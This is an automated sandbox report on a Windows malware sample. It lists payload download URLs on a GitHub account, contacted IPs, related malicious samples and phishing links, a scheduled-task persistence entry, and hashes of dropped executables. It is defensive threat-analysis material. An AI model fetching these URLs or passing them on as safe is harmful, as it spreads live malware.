    http://mingw-w64.sourceforge.net/Xpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://curl.se/docs/copyright.htmlsvchost.exe, console_zero.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://worldtimeapi.org/api/timezone/Etc/UTCpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2612733960.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000003B.00000002.2612200244.000001D64B0CC000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000003B.00000000.2583942814.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://www.zlib.net/Dpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363113098.00007FFDA5547000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612942389.00007FFDA5547000.00000002.00000001.01000000.00000011.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://curl.se/docs/hsts.html#console_zero.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe.net1&0Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe06Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://ipinfo.io/jsonpyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://www.openssl.org/HLd0f3NDosJ.exe, 00000003.00000003.2284751779.000001E8C10DD000.00000004.00000020.00020000.00000000.sdmp, pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp, svchost.exe, 00000035.00000002.3362491724.00007FFD93C8E000.00000002.00000001.01000000.00000010.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/amdg.datsvchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeC:Ld0f3NDosJ.exe, 00000003.00000002.2356468392.000001E8BF422000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334778364.000001E8BF422000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, 0000003B.00000002.2612733960.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000003B.00000000.2583942814.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://curl.se/docs/http-cookies.html#svchost.exe, console_zero.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://github.com/panchitopistolesx/items/raw/main/my_backup_asvchost.exe, 00000035.00000002.3361917101.000001BB8BD29000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/nvg.datsvchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://www.gnu.org/licenses/pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3360185514.00000000682A4000.00000008.00000001.01000000.0000000F.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://curl.se/Vpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613577176.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpu.datsvchost.exe, 00000035.00000003.2846038368.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2914585077.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3178715641.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3113596577.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3361335703.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3048858018.000001BB8BAF2000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    34.117.59.81
    		ipinfo.ioUnited States
    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
    185.199.108.133
    		raw.githubusercontent.comNetherlands
    		54113FASTLYUSfalse
    140.82.121.3
    		github.comUnited States
    		36459GITHUBUSfalse
    38.180.213.183
    		runvrs.comUnited States
    		174COGENT-174USfalse

    Private

    IP
    127.0.0.1

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1496433
    Start date and time:2024-08-21 09:38:50 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 11m 12s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:109
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:Ld0f3NDosJ.exe
    renamed because original name is a hash value
    Original Sample Name:00948444f3e248047722667419d54205.exe
    Detection:MAL
    Classification:mal100.evad.winEXE@157/53@5/5
    EGA Information:
    • Successful, ratio: 75%
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .exe

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, mm-mm.bing.net.trafficmanager.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target pyld64.exe, PID 4388 because there are no executed function
    • Execution Graph export aborted for target usvcinsta64.exe, PID 2736 because there are no executed function
    • Not all processes where analyzed, report is missing behavior information
    • Report creation exceeded maximum time and may have missing disassembly code information.
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtCreateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    03:39:47API Interceptor112x Sleep call for process: powershell.exe modified
    03:40:25API Interceptor9x Sleep call for process: svchost.exe modified
    03:40:29API Interceptor2x Sleep call for process: console_zero.exe modified
    09:40:30Task SchedulerRun new task: console_zero path: C:\Windows\System32\console_zero.exe

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    34.117.59.81mekotio_xoredps1.ps1Get hashmaliciousUnknownBrowse
    • ipinfo.io/json
    DevolucionImpuestoJulioTGR.cmd_BQVDQNuQQAGG.cmdGet hashmaliciousUnknownBrowse
    • ipinfo.io/json
    mek_n_bat.batGet hashmaliciousUnknownBrowse
    • ipinfo.io/json
    QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
    • ipinfo.io/json
    z30PO1028930.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
    • ipinfo.io/ip
    SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
    • ipinfo.io/ip
    SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
    • ipinfo.io/ip
    IP-Grabber.ps1Get hashmaliciousUnknownBrowse
    • ipinfo.io/ip
    BadUsb.ps1Get hashmaliciousUnknownBrowse
    • ipinfo.io/ip
    ZmYfQBiw.exeGet hashmaliciousUnknownBrowse
    • ipinfo.io/
    185.199.108.133https://github.com/Runsim12/Cleodf/raw/main/Tran_ID-Details009192_End_Ids_58788719853478_Pdf.rarGet hashmaliciousUnknownBrowse
      https://authenticatesrv.spiritproducts.net/ck1/2d6f.7c034e718db46b30/419a3880-5f16-11ef-b8e1-525400721611/9f8bdc6e12526302fc1bc1642c86f78252fda8c1/2?e=Nm%2BKwgX31zZZHmcYOfoRL7XItJEu0aj7qdUQZVkwW4SjJAvb0T0NYaII1ijFN8OsBsszx8gv12KAbT3RDPMeVw%2FbefV4L1yqgi%2FKG9lD6NQTrh%2BQ2ox9o1TV16RIuHKxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
        Payment Ref_29199_118001.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
          Secure_Transmission_Approval.htmGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
            Secure_Transmission_Approval.htmGet hashmaliciousUnknownBrowse
              V58VVR64wc.exeGet hashmaliciousUnknownBrowse
                OD8uS0ksdv.exeGet hashmaliciousUnknownBrowse
                  Lhz7Qbbaap.exeGet hashmaliciousUnknownBrowse
                    https://pzjop.allaeima.com/A1p9Z/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                      Direct - Deposit # 3576_.htmGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                        • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                        firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                        • github.com/john-xor/temp/blob/main/index.html?raw=true
                        0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                        • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                        MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                        • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                        RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                        • github.com/ssbb36/stv/raw/main/5.mp3

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ipinfo.io3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                        • 34.117.59.81
                        nf075-4d-qns0-w383.msiGet hashmaliciousUnknownBrowse
                        • 34.117.59.81
                        webWin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 34.117.59.81
                        W1nner client.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 34.117.59.81
                        http://telegramn.club/Get hashmaliciousTelegram PhisherBrowse
                        • 34.117.59.81
                        http://telcegram.cc/Get hashmaliciousUnknownBrowse
                        • 34.117.59.81
                        http://teloegram.club/Get hashmaliciousTelegram PhisherBrowse
                        • 34.117.59.81
                        mekotio_xoredps1.ps1Get hashmaliciousUnknownBrowse
                        • 34.117.59.81
                        WWAHost.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 34.117.59.81
                        IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                        • 34.117.59.81
                        github.com1C24TYY-H#U00f3a #U0111#U01a1n #U0111i#U1ec7n t#U1eed.jarGet hashmaliciousSTRRATBrowse
                        • 140.82.121.3
                        https://github.com/Runsim12/Cleodf/raw/main/Tran_ID-Details009192_End_Ids_58788719853478_Pdf.rarGet hashmaliciousUnknownBrowse
                        • 140.82.121.3
                        proof of payment.jarGet hashmaliciousSTRRATBrowse
                        • 140.82.121.4
                        https://authenticatesrv.spiritproducts.net/ck1/2d6f.7c034e718db46b30/419a3880-5f16-11ef-b8e1-525400721611/9f8bdc6e12526302fc1bc1642c86f78252fda8c1/2?e=Nm%2BKwgX31zZZHmcYOfoRL7XItJEu0aj7qdUQZVkwW4SjJAvb0T0NYaII1ijFN8OsBsszx8gv12KAbT3RDPMeVw%2FbefV4L1yqgi%2FKG9lD6NQTrh%2BQ2ox9o1TV16RIuHKxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.121.3
                        https://q68o.giantrype.com/8BSXIBCv/Get hashmaliciousTycoon2FABrowse
                        • 140.82.121.4
                        https://q68o.giantrype.com/8BSXIBCv/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.121.4
                        Payment Ref_96379_774494.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.112.3
                        Payment Ref_29199_118001.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.121.4
                        Secure_Transmission_Approval.htmGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.121.3
                        raw.githubusercontent.comOD8uS0ksdv.exeGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        OD8uS0ksdv.exeGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        Y1e7n1NMkI.exeGet hashmaliciousCoinhiveBrowse
                        • 185.199.110.133
                        lEzFKwZJRA.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        PSZIOD9wM7.exeGet hashmaliciousLummaC, Go InjectorBrowse
                        • 185.199.110.133
                        Setup_s.exeGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        AutoOC_GPU.exeGet hashmaliciousLuna StealerBrowse
                        • 185.199.108.133
                        SecuriteInfo.com.Win64.Evo-gen.15723.9736.exeGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        SecuriteInfo.com.Win64.MalwareX-gen.28480.11199.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                        • 185.199.110.133
                        http://dapp-cuteid.cvnlab.com/Get hashmaliciousUnknownBrowse
                        • 185.199.111.133

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        COGENT-174USAtlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                        • 154.23.184.194
                        jew.arm7.elfGet hashmaliciousMiraiBrowse
                        • 149.107.159.240
                        jew.x86.elfGet hashmaliciousUnknownBrowse
                        • 136.161.34.85
                        53QoH91Zg3.exeGet hashmaliciousUnknownBrowse
                        • 23.237.96.90
                        Document 21824RXVPO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                        • 154.23.184.141
                        xd.arm7.elfGet hashmaliciousMiraiBrowse
                        • 38.211.255.230
                        https://ushcada.top/Get hashmaliciousUnknownBrowse
                        • 149.115.239.8
                        A_2.exeGet hashmaliciousFormBookBrowse
                        • 38.238.78.186
                        xd.arm.elfGet hashmaliciousMiraiBrowse
                        • 154.25.218.18
                        x86.elfGet hashmaliciousUnknownBrowse
                        • 38.162.129.255
                        GOOGLE-AS-APGoogleAsiaPacificPteLtdSG3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                        • 34.117.59.81
                        https://monogogo.info/JQJMLAWN#em=npaladino@bigge.comGet hashmaliciousPhisherBrowse
                        • 34.117.39.58
                        https://l.facebook.com/l.php?u=https%3A%2F%2Fshorten.tv%2F%40helpcontact854939854%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0AlBWT8tz2ATnLxZarfLrJKfzX-PTT2xLYu__SILtfzriXSPrd_VaQ_ec_aem_RKx-cZnVIEeJshcNUM3bDw&h=AT1nrUfgKAY-l-qrEUgKghjlBQ4Hw-C3zCH42kR3K0v-nyHHp3WxV3Xt8-4Aa5wwFKYewV7x9VvrM84jIGiP4fXXAQecfZh13KPtsvx16U5h91HCqz40KTpMlRSlpgITs6MGet hashmaliciousUnknownBrowse
                        • 34.117.101.88
                        nf075-4d-qns0-w383.msiGet hashmaliciousUnknownBrowse
                        • 34.117.59.81
                        kovENvYM9C.elfGet hashmaliciousUnknownBrowse
                        • 34.117.230.253
                        http://pickvibe.lt/lt/p/miestu-renginiai/renginiai-naujojoje-akmenejeGet hashmaliciousUnknownBrowse
                        • 34.117.239.71
                        webWin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 34.117.59.81
                        W1nner client.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 34.117.59.81
                        file.exeGet hashmaliciousAmadey, StealcBrowse
                        • 34.117.188.166
                        file.exeGet hashmaliciousBabadedaBrowse
                        • 34.117.188.166
                        GITHUBUS1C24TYY-H#U00f3a #U0111#U01a1n #U0111i#U1ec7n t#U1eed.jarGet hashmaliciousSTRRATBrowse
                        • 140.82.121.3
                        https://github.com/Runsim12/Cleodf/raw/main/Tran_ID-Details009192_End_Ids_58788719853478_Pdf.rarGet hashmaliciousUnknownBrowse
                        • 140.82.121.3
                        proof of payment.jarGet hashmaliciousSTRRATBrowse
                        • 140.82.121.4
                        http://dineshramgovindaraj.github.io/netflixGet hashmaliciousUnknownBrowse
                        • 140.82.114.18
                        https://authenticatesrv.spiritproducts.net/ck1/2d6f.7c034e718db46b30/419a3880-5f16-11ef-b8e1-525400721611/9f8bdc6e12526302fc1bc1642c86f78252fda8c1/2?e=Nm%2BKwgX31zZZHmcYOfoRL7XItJEu0aj7qdUQZVkwW4SjJAvb0T0NYaII1ijFN8OsBsszx8gv12KAbT3RDPMeVw%2FbefV4L1yqgi%2FKG9lD6NQTrh%2BQ2ox9o1TV16RIuHKxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.121.3
                        https://q68o.giantrype.com/8BSXIBCv/Get hashmaliciousTycoon2FABrowse
                        • 140.82.121.4
                        https://q68o.giantrype.com/8BSXIBCv/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.121.4
                        Payment Ref_96379_774494.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.112.3
                        Payment Ref_29199_118001.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.121.4
                        Secure_Transmission_Approval.htmGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                        • 140.82.121.3
                        FASTLYUS1C24TYY-H#U00f3a #U0111#U01a1n #U0111i#U1ec7n t#U1eed.jarGet hashmaliciousSTRRATBrowse
                        • 199.232.196.209
                        https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?Get hashmaliciousUnknownBrowse
                        • 199.232.188.157
                        https://github.com/Runsim12/Cleodf/raw/main/Tran_ID-Details009192_End_Ids_58788719853478_Pdf.rarGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        https://doc.clickup.com/9014542322/d/h/8cmxzzj-434/d3ec30ee79aa63aGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.195.9
                        proof of payment.jarGet hashmaliciousSTRRATBrowse
                        • 199.232.196.209
                        https://benyera.com/workprojects/index.phpGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.194.137
                        https://www.dropbox.com/l/scl/AAC7bZ0VQI_UDvxV34o89OGVuGeoyGILFFwGet hashmaliciousUnknownBrowse
                        • 151.101.8.157
                        https://competitiveplumbing.com.au/Get hashmaliciousHTMLPhisherBrowse
                        • 151.101.129.140
                        http://freeusps.com/collections/love-wedding/products/love-flourishes-2018-4946Get hashmaliciousUnknownBrowse
                        • 199.232.188.159
                        https://akashguptaji.github.io/netflix/Get hashmaliciousHTMLPhisherBrowse
                        • 185.199.109.153

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        bd0bf25947d4a37404f0424edf4db9adSecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exeGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        SecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exeGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        file.exeGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        file.exeGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        gutpOKDunr.exeGet hashmaliciousXmrigBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        idman642build18Full.exeGet hashmaliciousFredy StealerBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        idman642build18Full.exeGet hashmaliciousFredy StealerBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        IObit Advanced System Care Pro.exeGet hashmaliciousFredy StealerBrowse
                        • 185.199.108.133
                        • 140.82.121.3
                        • 34.117.59.81
                        37f463bf4616ecd445d4a1937da06e19air_way_bill_Dhl_invoice_bl_pl_21_08_2024_00000000.xlsGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        Tracking_Invoice_Awb_BL_00340434757340073972.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 185.199.108.133
                        August_September_Purchase_Order_xls_0029102008202024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 185.199.108.133
                        groupfunctionpro.exeGet hashmaliciousLatrodectusBrowse
                        • 185.199.108.133
                        3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                        • 185.199.108.133
                        DonghwanPOGM210820242020032108174KR18190824pu.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 185.199.108.133
                        file.exeGet hashmaliciousZhark RATBrowse
                        • 185.199.108.133
                        sample.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 185.199.108.133
                        ExeFile (274).exeGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        ExeFile (308).exeGet hashmaliciousUnknownBrowse
                        • 185.199.108.133

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\Public\tmp.enc

                        Download File
                        Process:C:\Windows\System32\crypti.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16
                        Entropy (8bit):3.875
                        Encrypted:false
                        SSDEEP:3:ktUOI2Gn:kI2Gn
                        MD5:B101F729FB1107BF23CE00FBF4A10A7F
                        SHA1:A65B1C3C3C56A10D62B8FF00E7F10BA1E54AA58B
                        SHA-256:B2F87025C70B31CBF2BC3E3A6995A93B0F469A8D72AB7E45C73D1DCFB49135CB
                        SHA-512:8FA5EE1410B19549497D974F705D95ED603E59AE1BAD3D6DCBC0AB7B9AE41242C3871CAF7354163692154D80990EB3788670F084650CE32EBE94E1508CB9CB96
                        Malicious:false
                        Preview:!...S..%.e..-.c

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe

                        Download File
                        Process:C:\Users\user\Desktop\Ld0f3NDosJ.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):15180800
                        Entropy (8bit):6.5564607842905644
                        Encrypted:false
                        SSDEEP:393216:4PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:4ITkS6
                        MD5:43BCE45D873189F9AE2767D89A1C46E0
                        SHA1:34BC871A24E54A83740E0DF51320B9836D8B820B
                        SHA-256:9AE4784F0B139619CA8FDADFA31B53B1CBF7CD2B45F74B7E4004E5A97E842291
                        SHA-512:F3424B65C72E242E77E5129903B4DC42FB94076402D24C9F2CEA07FF117761942ECEDEC43E0AD6E39EF61628ED0C4709BE7706E3C20537D476EDB57DF2521380
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 18%
                        • Antivirus: Virustotal, Detection: 65%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........l..?..?..?.,.>`..?.,.>..?.,.>..?.).>..?.).>..?.).>...?.,.>..?..?V..?.(.>..?.(z?..?.(.>..?Rich..?........PE..d...hC.f.........."....).............5.........@..........................................`.................................................dC..<................7......................8...............................@...............`............................text............................... ..`.rdata...n.......p..................@..@.data... /...P.......D..............@....pdata...7.......8...\..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Preview:@...e...........................................................

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0cpijhtc.sbq.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
